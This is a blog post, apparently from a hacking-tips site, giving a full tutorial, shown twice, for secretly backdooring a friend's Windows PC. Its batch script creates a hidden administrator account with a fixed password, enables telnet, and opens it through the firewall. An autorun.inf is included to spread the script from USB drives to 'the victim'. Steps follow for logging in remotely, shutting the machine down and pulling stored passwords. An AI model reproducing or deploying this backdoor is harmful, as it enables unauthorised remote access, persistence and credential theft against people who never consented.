Basic Tutorials
Downloads
DOWNLOADS
Browsers
Recent Articles
Access your friends Machine Remotely
Here the full trick
If you have physical access to ur friends machine then u can access his machine remotely using telnet server. All u have to do is to create a user account there then hide that user from logon screen and then start telnet server and finally mark telnet as a exception in firewall.These stepes can be carried out simply and faster using a simple batch file(instal.bat). Here i m providing the source of batch file: instal.bat
@echo OFF
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add
sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%system32tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLMsoftwaremicrosoftwindows NTCurrentVersionwinlogonspecialaccountsUserList” /v IE_USR /t REG_DWORD /d 0
Now u can make this file to spread from one machine to another according to ur own method like i use to spread this file as a autoplay program in pen drives. Here i m providing u the code for autoplaying just put these two files in pen drive and u r work is done. autorun.inf
[autorun]
open=instal.bat
Now what? when the victim plug this pen drive in his/her PC instal.bat runs and it will do all the work for u then u meet ur frnd online on yahoo msgr and use start>run>netstat -n 4 [press enter] to find his ip address. After getting the ipaddress goto start>run>telnet ipaddress [press enter] now press y and then use these login detail to get login username: IE_USR
password: 123456 Nice work naa!!! i know. now u have the shell prompt of friend machine now u can do anything u can see what task are running there using tasklist command, u can shutdown his machine using shutdown -s, u can even get stored password from registry, u can do almost everthing from command prompt. Belive me this one is the simplest way.
@echo OFF
net user IE_USR 123456 /add
net localgroup administrators IE_USR /add
net localgroup “remote desktop users” IE_USR /add
sc config tlntsvr start= auto
netsh firewall set allowedprogram %windir%system32tlntsvr.exe iexplorer enable
sc start tlntsvr
reg add “HKLMsoftwaremicrosoftwindows NTCurrentVersionwinlogonspecialaccountsUserList” /v IE_USR /t REG_DWORD /d 0
Now u can make this file to spread from one machine to another according to ur own method like i use to spread this file as a autoplay program in pen drives. Here i m providing u the code for autoplaying just put these two files in pen drive and u r work is done. autorun.inf
[autorun]
open=instal.bat
Now what? when the victim plug this pen drive in his/her PC instal.bat runs and it will do all the work for u then u meet ur frnd online on yahoo msgr and use start>run>netstat -n 4 [press enter] to find his ip address. After getting the ipaddress goto start>run>telnet ipaddress [press enter] now press y and then use these login detail to get login username: IE_USR
password: 123456 Nice work naa!!! i know. now u have the shell prompt of friend machine now u can do anything u can see what task are running there using tasklist command, u can shutdown his machine using shutdown -s, u can even get stored password from registry, u can do almost everthing from command prompt. Belive me this one is the simplest way.
Related posts:
If you enjoyed this article, subscribe to receive more great content just like it.
0 comments for this post
Leave a reply
Write your message here.
Please leave your Email Id so that I can contact you.
Thanks for your Valuable Suggestion,
Subscribe to:
Post Comments (Atom)
Softwares Download
- Making a blog at blogspot
- Blog Setting
- How to backing up template
- How to backing up widgets
- How to changing template
- Make a Post Summary (Read more)
- Blog Comment send to @mail
- Adding search engine to blog
- Making a drop down menu
- Add google talk to blog (1)
- Making a News Paper Style Drop Caps
- Adding Recent Post & Recent Comments
- Adding Yahoo!Massenger icon
- Adding Google talk (2)
- Adding yahoo! Massenger Emoticons (1)
- Fix error "Widget IDs should be unique"
- Making a Table of Content
- Adding shoutbox
- Adding user online tracker
- Adding Statistic & tracker
- Adding digg button to post page
- Upload image to image hosting
- Making a Logo and image button
- Adding Favicon to URL address
- Adding a Clock to blog
- Removing the number of label
Our Friends